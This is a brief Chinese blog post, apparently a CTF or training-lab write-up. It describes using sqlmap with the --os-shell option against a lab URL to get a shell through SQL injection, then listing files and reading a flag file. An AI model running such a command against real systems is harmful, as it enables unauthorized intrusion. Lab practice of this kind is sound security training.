昨天搞了一晚上 没搞好今天突然想起来用sqlmap跑 本来想着是手工 还是没能做出来
sqlmap的安装就不讲了可以百度 一百度一大堆
直接上sqlmap
poc语句 python2 sqlmap.py -u http://8adc3387c2eda6cce.lab.aqlab.cn8001/single.php?id=1 --os-shell
一条命令直接拿下....跑下来以后
dir 查看文件 类似于 Linux中的ls
发现falg.php
type 查看 得到flag
打赏我,让我更有动力~
© 2016 - 2022 掌控者 All Rights Reserved.